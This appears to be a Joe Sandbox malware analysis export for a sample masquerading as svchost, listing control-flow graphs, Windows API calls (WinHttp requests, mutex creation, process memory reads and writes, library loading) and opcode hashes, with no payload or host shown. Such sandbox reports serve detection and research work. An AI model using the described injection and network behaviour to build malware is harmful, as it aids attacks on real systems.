          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: InfoSleepStartup_amsg_exit_cexit_inittermexit
          • String ID:
          • API String ID: 2456207614-0
          • Opcode ID: 5360f1c04b7edbaa5d775165d56065c574be986e94f26ab25caa58a34893f057
          • Instruction ID: dd7bef42800268433d42df4e9d168aee914250b00c3c1566757323a5b0bfa38a
          • Opcode Fuzzy Hash: 5360f1c04b7edbaa5d775165d56065c574be986e94f26ab25caa58a34893f057
          • Instruction Fuzzy Hash: 1951063160564086EB629F56E880BAA33F1F34C7C4F54442AFB8A8B6B5DB7AC985C741

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 594 14000e2b0-14000e2e3 ??2@YAPEAX_K@Z 595 14000e2e5-14000e2fc memset 594->595 596 14000e2fe 594->596 597 14000e305-14000e319 595->597 596->597 598 14000e320-14000e34c call 14000e0c0 597->598 601 14000e366-14000e38a LoadLibraryExW 598->601 602 14000e34e 598->602 603 14000e3d4-14000e3db 601->603 604 14000e38c-14000e391 601->604 605 14000e350-14000e364 602->605 603->598 607 14000e3e1-14000e401 603->607 606 14000e3a0-14000e3d2 call 14000e0c0 GetProcAddress 604->606 605->601 605->605 606->603
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ??2@AddressLibraryLoadProcmemset
          • String ID:
          • API String ID: 2223267934-0
          • Opcode ID: 9fb993bdcbc7801996536c00c379125405486b2bffe6ba4f148ffbbb4ef29a0d
          • Instruction ID: 81936db8f0c84c524282d08abef79f670da5901e330344387f2b7120425cec9c
          • Opcode Fuzzy Hash: 9fb993bdcbc7801996536c00c379125405486b2bffe6ba4f148ffbbb4ef29a0d
          • Instruction Fuzzy Hash: B031A832610B8095EB22DF16F8543DE77A0F788BC8F884426EF995766ADF39CA45C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 610 1400175a0-1400175e6 call 14000e0c0 613 140017606-14001762c ConvertStringSecurityDescriptorToSecurityDescriptorW 610->613 614 1400175e8 610->614 616 14001763e-140017646 613->616 617 14001762e-14001763c 613->617 615 1400175f0-140017604 614->615 615->613 615->615 618 14001764b-140017687 call 14000e0c0 616->618 617->618 621 1400176a6-1400176d1 CreateMutexExW 618->621 622 140017689 618->622 624 1400176d3 621->624 625 1400176e0-1400176e3 621->625 623 140017690-1400176a4 622->623 623->621 623->623 624->625 626 1400176f1-140017719 625->626 627 1400176e5-1400176f0 exit 625->627 627->626
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: DescriptorSecurity$ConvertCreateMutexStringexitmemset
          • String ID:
          • API String ID: 3507615276-0
          • Opcode ID: 7e300d048cb3985760b73ca4915f977cc0e0939f1735c7342c0fd7b69dda5c44
          • Instruction ID: b79e1125e13a50f3d4fcebabcacaf9d25f3fc3441ac5dd85b6d2232f2856bb17
          • Opcode Fuzzy Hash: 7e300d048cb3985760b73ca4915f977cc0e0939f1735c7342c0fd7b69dda5c44
          • Instruction Fuzzy Hash: 6D416D72204B8581DB228F16E4507EA77B0FB8DBC5F448066EB8D47769DF79C946CB40

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 629 14000cc50-14000cc95 GetCurrentProcess OpenProcessToken 630 14000cc9b-14000cccb GetTokenInformation 629->630 631 14000cd30-14000cd3b 629->631 630->631 634 14000cccd-14000cd12 630->634 632 14000cd4a-14000cd55 631->632 633 14000cd3d 631->633 635 14000cd64-14000cd6f 632->635 636 14000cd57 632->636 633->632 634->631 638 14000cd14-14000cd2e 634->638 636->635 638->631
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ProcessToken$CurrentInformationOpen
          • String ID:
          • API String ID: 2743777493-0
          • Opcode ID: ef76699d8adb88cef57f707c04710a59947ad96b4545d95d8a55f2534c219ce9
          • Instruction ID: c74a2c0aa10743c207ec1e219136a5575fa09d5bc2334c12703a290418d10ba9
          • Opcode Fuzzy Hash: ef76699d8adb88cef57f707c04710a59947ad96b4545d95d8a55f2534c219ce9
          • Instruction Fuzzy Hash: 65311A72615B8686DB61CF16E4947EEBBE4FBC8B84F044126DB8943B28DF38D549CB40

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 640 1dd0ee20000-1dd0ee20014 641 1dd0ee20020-1dd0ee20028 640->641 642 1dd0ee2002e-1dd0ee20037 641->642 643 1dd0ee20171-1dd0ee20174 641->643 646 1dd0ee2004c-1dd0ee2004f 642->646 647 1dd0ee20039-1dd0ee20047 642->647 644 1dd0ee201a1-1dd0ee201d3 643->644 645 1dd0ee20176-1dd0ee20179 643->645 648 1dd0ee201d6-1dd0ee20210 644->648 645->648 649 1dd0ee2017b-1dd0ee2019c 645->649 650 1dd0ee20051-1dd0ee20063 646->650 651 1dd0ee20068-1dd0ee2006b 646->651 647->649 649->641 650->649 654 1dd0ee2006d-1dd0ee20083 651->654 655 1dd0ee20088-1dd0ee2008b 651->655 654->649 656 1dd0ee2008d-1dd0ee200a7 655->656 657 1dd0ee200ac-1dd0ee200af 655->657 656->649 662 1dd0ee200d4-1dd0ee200d7 657->662 663 1dd0ee200b1-1dd0ee200cf LdrLoadDll 657->663 668 1dd0ee2011e-1dd0ee20121 662->668 669 1dd0ee200d9-1dd0ee2011c 662->669 663->649 668->649 670 1dd0ee20123-1dd0ee2016f 668->670 669->649 670->649
          Memory Dump Source
          • Source File: 00000006.00000002.2121724866.000001DD0EE20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001DD0EE20000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_1dd0ee20000_svchost.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 44c00fefa8dee2791824ffa64c28be73b2be40f84a10099b5124b8c7914ad373
          • Instruction ID: 594aa605081497ddfe7d26924722aa9f1a46709b3c6b3a29cbe7ffccb02227dc
          • Opcode Fuzzy Hash: 44c00fefa8dee2791824ffa64c28be73b2be40f84a10099b5124b8c7914ad373
          • Instruction Fuzzy Hash: A071D670618A099FDB94EF2CC484F55B7E1FBA8304F60065EE44EC7695D732E892CB81

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 674 140017db4-140017dfc __wgetmainargs
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: __wgetmainargs
          • String ID:
          • API String ID: 1709950718-0
          • Opcode ID: 1964c3ef71c522d8cac27037b9fad85a0d91a07838b54d6a462ab3137a1b4d49
          • Instruction ID: 6aec88c559ee83b68dd4777cae1c7270f0cd78b8661183991cc7666a73bb9bd7
          • Opcode Fuzzy Hash: 1964c3ef71c522d8cac27037b9fad85a0d91a07838b54d6a462ab3137a1b4d49
          • Instruction Fuzzy Hash: A1E09274605B429AFB438B02F8407C03760B30D3C8F80401EEA4853736DB3CCA6ACB40

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 675 1400179c0-140017a3b memset WinHttpCrackUrl 676 140017a41-140017a47 675->676 677 140017d9c-140017dad 675->677 678 140017a52-140017a6a call 14000e580 676->678 679 140017a49-140017a4c 676->679 678->677 682 140017a70-140017a8d call 14000e580 678->682 679->677 679->678 685 140017a93-140017ae6 call 140002800 * 2 call 14000e0c0 682->685 686 140017d4b-140017d63 HeapFree 682->686 696 140017b06-140017b25 WinHttpOpen 685->696 697 140017ae8 685->697 687 140017d65-140017d74 HeapFree 686->687 688 140017d7a-140017d85 686->688 687->688 688->677 690 140017d87-140017d96 HeapFree 688->690 690->677 699 140017d43 696->699 700 140017b2b-140017b66 WinHttpSetTimeouts WinHttpConnect 696->700 698 140017af0-140017b04 697->698 698->696 698->698 699->686 701 140017d3a-140017d3d WinHttpCloseHandle 700->701 702 140017b6c-140017b93 call 14000e0c0 700->702 701->699 705 140017bb6-140017bc0 702->705 706 140017b95 702->706 708 140017bc2-140017bc6 705->708 709 140017bc8-140017bcb 705->709 707 140017ba0-140017bb4 706->707 707->705 707->707 710 140017bd9-140017bfc WinHttpOpenRequest 708->710 711 140017d31-140017d34 WinHttpCloseHandle 709->711 712 140017bd1 709->712 713 140017c02-140017c22 WinHttpSendRequest 710->713 714 140017d2c 710->714 711->701 712->710 715 140017d23-140017d26 WinHttpCloseHandle 713->715 716 140017c28-140017c35 WinHttpReceiveResponse 713->716 714->711 715->714 716->715 717 140017c3b-140017c6e WinHttpQueryHeaders 716->717 717->715 718 140017c74-140017c80 717->718 718->715 719 140017c86 718->719 720 140017c90-140017ca8 WinHttpQueryDataAvailable 719->720 720->715 721 140017caa-140017cb2 720->721 722 140017cb4-140017cbd 721->722 723 140017d07-140017d20 call 14000cd70 721->723 724 140017cd9-140017ce7 call 14000e580 722->724 725 140017cbf-140017cd7 call 14000e580 722->725 723->715 732 140017cea-140017cfd WinHttpReadData 724->732 725->732 732->715 733 140017cff-140017d05 732->733 733->720 733->723
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Http$CloseFreeHandleHeap$DataOpenQueryRequest$AddressAvailableConnectCrackHeadersLibraryLoadProcReadReceiveResponseSendTimeoutsmemset
          • String ID: h
          • API String ID: 924098880-2439710439
          • Opcode ID: 5381ae17751d1395b7447e3cb6081e5e3852b3b2c1ef0d6eebbe8c66b7312723
          • Instruction ID: 1498001942143cf4250ef2d81509e8fca94ec240472a1244b462215344734eb3
          • Opcode Fuzzy Hash: 5381ae17751d1395b7447e3cb6081e5e3852b3b2c1ef0d6eebbe8c66b7312723
          • Instruction Fuzzy Hash: FCA19031604A858AE762CF27A8547EA77B1FB8DBC8F044115EF4D4BBA8DF3AC5458740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 734 140003860-1400038d4 call 14000d420 739 1400038d6-1400038da 734->739 740 14000394d-140003951 734->740 739->740 743 1400038dc-140003903 call 14000e0c0 739->743 741 140003957-140003961 740->741 742 140003a2b-140003a3e 740->742 741->742 745 140003967-14000398e call 14000e580 * 2 741->745 744 140003a40-140003a57 742->744 751 140003905 743->751 752 140003926-140003941 743->752 753 140003ad6-140003ae1 744->753 754 140003a59-140003a64 744->754 762 140003994-140003997 745->762 763 140003a25 745->763 756 140003910-140003924 751->756 752->740 764 140003943 752->764 760 140003ae5-140003b04 753->760 754->753 757 140003a66-140003a7a 754->757 756->752 756->756 761 140003a80-140003a8a 757->761 769 140003cf9-140003d01 760->769 770 140003b0a-140003b10 760->770 766 140003aa7-140003aaa 761->766 767 140003a8c-140003a93 761->767 762->763 768 14000399d-1400039cf call 14000ea80 762->768 763->742 764->740 773 140003ab6-140003abd 766->773 774 140003aac-140003ab0 766->774 767->766 771 140003a95-140003aa3 767->771 782 1400039d1-1400039f2 768->782 783 1400039f6-1400039f9 768->783 769->744 779 140003d07-140003d0e 769->779 775 140003b14-140003b17 770->775 771->761 776 140003aa5 771->776 773->753 778 140003abf-140003ad4 773->778 774->773 780 140003b22-140003b4d WinHttpConnect 775->780 781 140003b19-140003b1c WinHttpCloseHandle 775->781 776->774 778->760 784 140003d22-140003d29 779->784 785 140003d10-140003d1c HeapFree 779->785 788 140003b5b-140003b6c 780->788 789 140003b4f-140003b54 780->789 781->780 782->783 790 1400039fb-140003a0a HeapFree 783->790 791 140003a10-140003a1f HeapFree 783->791 786 140003d2b-140003d37 HeapFree 784->786 787 140003d3d-140003d44 784->787 785->784 786->787 792 140003d46-140003d52 HeapFree 787->792 793 140003d58-140003d5f 787->793 795 140003b70-140003b74 788->795 789->775 794 140003b56 789->794 790->791 791->763 792->793 796 140003d61-140003d6d HeapFree 793->796 797 140003d73-140003d7a 793->797 798 140003ca6-140003cbe 794->798 799 140003b84-140003b87 795->799 800 140003b76-140003b7d 795->800 796->797 801 140003d7c-140003d88 HeapFree 797->801 802 140003d8e-140003dab HeapFree 797->802 798->779 803 140003cc0-140003ce6 798->803 805 140003c2d-140003c35 799->805 806 140003b8d-140003bab call 14000e580 799->806 800->795 804 140003b7f 800->804 801->802 807 140003db3-140003db6 802->807 808 140003dad WinHttpCloseHandle 802->808 809 140003ce8 803->809 810 140003ced-140003cf3 803->810 804->805 805->798 811 140003c3b-140003c3e 805->811 821 140003bb1-140003bb4 806->821 822 140003c2a 806->822 813 140003dc1-140003dc4 807->813 814 140003db8-140003dbb WinHttpCloseHandle 807->814 808->807 809->810 810->769 815 140003c40-140003c7b call 140008bf0 811->815 818 140003dc6-140003dc9 WinHttpCloseHandle 813->818 819 140003dcf-140003dd7 813->819 814->813 828 140003c98-140003c9a 815->828 829 140003c7d-140003c94 815->829 818->819 826 140003dd9-140003de5 HeapFree 819->826 827 140003deb-140003e35 819->827 824 140003c15-140003c24 HeapFree 821->824 825 140003bb6-140003bbd 821->825 822->805 824->822 825->824 830 140003bbf-140003bd4 825->830 826->827 833 140003c9c-140003ca1 828->833 829->815 837 140003c96 829->837 831 140003bd7-140003bde 830->831 835 140003bf8-140003bfb 831->835 836 140003be0-140003be8 831->836 833->798 840 140003c07-140003c0e 835->840 841 140003bfd-140003c01 835->841 836->835 838 140003bea-140003bf4 836->838 837->833 838->831 842 140003bf6 838->842 840->824 843 140003c10-140003c13 840->843 841->840 842->841 843->805
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$Http$CloseHandle$ConnectOpenmemset
          • String ID: gfff
          • API String ID: 2669603317-1553575800
          • Opcode ID: a95b2586bbd460e69ec2be79498c36138f74c0e8d271ec2a65c1289937f3eb6e
          • Instruction ID: e375e4b6913abfcb066fb2510dea88db1f1922a69a85b8abfbf5752ff8901941
          • Opcode Fuzzy Hash: a95b2586bbd460e69ec2be79498c36138f74c0e8d271ec2a65c1289937f3eb6e
          • Instruction Fuzzy Hash: 64F17D72600B8482EB93DF16E8547EA27A8FB8DBD4F04411AEB8A577B5DF38C945C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 953 140015340-140015367 954 140015791-1400157a2 953->954 955 14001536d-140015381 953->955 956 140015384-140015387 955->956 957 140015389-140015396 call 14000e580 956->957 958 14001539b-1400153a2 956->958 965 140015426-14001548f call 14000f8d0 call 140016030 957->965 960 1400153a4-1400153b0 HeapFree 958->960 961 1400153b6-1400153be 958->961 960->961 963 1400153d2-1400153da 961->963 964 1400153c0-1400153cc HeapFree 961->964 966 1400153dc-1400153e8 HeapFree 963->966 967 1400153ee-1400153f6 963->967 964->963 975 1400156a3-1400156ba 965->975 976 140015495-140015498 965->976 966->967 968 1400153f8-140015404 HeapFree 967->968 969 14001540a-140015412 967->969 968->969 969->965 971 140015414-140015420 HeapFree 969->971 971->965 975->956 978 1400156c0-1400156eb 975->978 976->975 977 14001549e-1400154d0 call 14000e0c0 976->977 986 1400154d2-1400154e6 977->986 987 1400154e8-140015506 977->987 978->954 979 1400156f1-1400156f8 978->979 981 1400156fa-140015706 HeapFree 979->981 982 14001570c-140015714 979->982 981->982 984 140015716-140015722 HeapFree 982->984 985 140015728-140015730 982->985 984->985 988 140015732-14001573e HeapFree 985->988 989 140015744-14001574c 985->989 986->986 986->987 993 140015518-140015543 call 14000e0c0 987->993 994 140015508-140015513 call 140016ba0 987->994 988->989 991 14001574e-14001575a HeapFree 989->991 992 140015760-140015768 989->992 991->992 995 14001576a-140015776 HeapFree 992->995 996 14001577c-14001578b HeapFree 992->996 1001 140015566-140015582 993->1001 1002 140015545 993->1002 994->975 995->996 996->954 1005 1400157a3-1400157ae 1001->1005 1006 140015588-140015599 1001->1006 1003 140015550-140015564 1002->1003 1003->1001 1003->1003 1005->975 1007 1400157b4-1400157b9 1005->1007 1008 1400155d5-1400155e0 1006->1008 1009 14001559b 1006->1009 1007->975 1012 1400157bf 1007->1012 1010 1400155e2-140015607 _time64 1008->1010 1011 14001560d 1008->1011 1013 1400155a0-1400155bc 1009->1013 1010->975 1010->1011 1014 140015610-140015662 call 14000caf0 1011->1014 1015 1400157c0-1400157c6 1012->1015 1013->1008 1020 1400155be-1400155d3 1013->1020 1031 140015668-14001566b 1014->1031 1032 1400158b7-1400158d7 call 14000e580 1014->1032 1016 1400157d1-1400157d9 1015->1016 1017 1400157c8-1400157cf 1015->1017 1016->975 1021 1400157df-1400157e9 1016->1021 1017->1015 1017->1016 1020->1008 1020->1013 1023 14001580c-140015833 1021->1023 1024 1400157eb 1021->1024 1026 140015835-14001583c 1023->1026 1027 14001584e-140015850 1023->1027 1025 1400157f0-14001580a 1024->1025 1025->1023 1025->1025 1029 140015840-140015842 1026->1029 1027->975 1030 140015856-14001587d call 14000e580 1027->1030 1029->1027 1033 140015844-14001584c 1029->1033 1030->1014 1042 140015883-1400158b2 1030->1042 1035 140015689-14001568c 1031->1035 1036 14001566d-140015684 _time64 1031->1036 1032->1035 1041 1400158dd-140015923 _time64 1032->1041 1033->1027 1033->1029 1035->975 1040 14001568e-14001569d HeapFree 1035->1040 1036->1035 1040->975 1041->975 1042->1014
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$_time64$AddressLibraryLoadProcmemset
          • String ID:
          • API String ID: 4044016582-0
          • Opcode ID: 976164784313fb201fc363347bf02393d1a175d1830bf4b901d432c3735b5581
          • Instruction ID: 1ff008e7178ffe5c36afa01dae6893e19bf73e557f2170abeac8c26d8b64783f
          • Opcode Fuzzy Hash: 976164784313fb201fc363347bf02393d1a175d1830bf4b901d432c3735b5581
          • Instruction Fuzzy Hash: 68F14672200B80C6EB52DF1AD4943EA37A5F788BC5F15812AEB8E9B7A5DF35C485C740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: memset
          • String ID: @
          • API String ID: 2221118986-2766056989
          • Opcode ID: c169588ed08e8372eaba719479e975c479cb340a6a88987632b20084c5243531
          • Instruction ID: 3b6190bc3fad717221f5bbcce2ae25d4d52b3cf8b168bce159151464274ee265
          • Opcode Fuzzy Hash: c169588ed08e8372eaba719479e975c479cb340a6a88987632b20084c5243531
          • Instruction Fuzzy Hash: 15021836610B8485EB62DF26E8907EA67A0F78CBC8F44412AEF8D47B69DF39C154C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$_time64$FileSleepTime
          • String ID:
          • API String ID: 2289066803-0
          • Opcode ID: 40ba65c08b9e5bb65b5414c166f13d3b7ca319df4cbb5a065c46412f29ab1c83
          • Instruction ID: 1ab422d41cd114fbfdff5d5c6448fbea51a6bf4249b6e681b0e7df56046467f6
          • Opcode Fuzzy Hash: 40ba65c08b9e5bb65b5414c166f13d3b7ca319df4cbb5a065c46412f29ab1c83
          • Instruction Fuzzy Hash: DFF18B76200B8586EB61DF26E8543EE37A4F789BC8F408126EB8D47BA5CF39C549D740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
          • String ID:
          • API String ID: 3266983031-0
          • Opcode ID: 1c4ec40dd17319df299da24903791129a37fd02a472f3cc71aadb4a76c336ffa
          • Instruction ID: 6ca92d44798bfbdcd13931f1ba461a477904d21d6d181f3beb0808d86e954708
          • Opcode Fuzzy Hash: 1c4ec40dd17319df299da24903791129a37fd02a472f3cc71aadb4a76c336ffa
          • Instruction Fuzzy Hash: C3319275104B4486EB629B16F8843DAB3A4F78C7D4F50411AEB8D47B79DF79C658C700
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$AllocMemoryProcessVirtualWritelstrlen
          • String ID:
          • API String ID: 2980677570-0
          • Opcode ID: c8bad31549eb03286af95aea3e69b03a8021d278381b3c8cbf91d7313f1d40d0
          • Instruction ID: 2dab337ee8d68b7cc9e8264ef1f707780b607853232d03d74ae5f575a22fd722
          • Opcode Fuzzy Hash: c8bad31549eb03286af95aea3e69b03a8021d278381b3c8cbf91d7313f1d40d0
          • Instruction Fuzzy Hash: 92814632215B8186E7A28B12E84479BB7A4F78CBD4F044129EFCD87BA5EF38C545CB00
          APIs
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBE9
            • Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
            • Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0
            • Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
            • Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
            • Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
            • Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
            • Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E
            • Part of subcall function 000000014000E580: RtlAllocateHeap.NTDLL ref: 000000014000E6A9
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB3C
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB56
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB74
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB96
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBB0
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBCA
            • Part of subcall function 0000000140013B00: ReadProcessMemory.KERNEL32 ref: 0000000140013B25
            • Part of subcall function 000000014000BF10: HeapFree.KERNEL32(?,?,?,?,?,000000014000247B,?,?,?,00000001400023F7), ref: 000000014000BFA0
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Heap$Free$AddressProc$AllocateProcess$LibraryLoadMemoryRead
          • String ID:
          • API String ID: 2491122006-0
          • Opcode ID: 09873fec92877f518c362985b5da0a46ce3d3219a83bb375dbd9e82aa2709a25
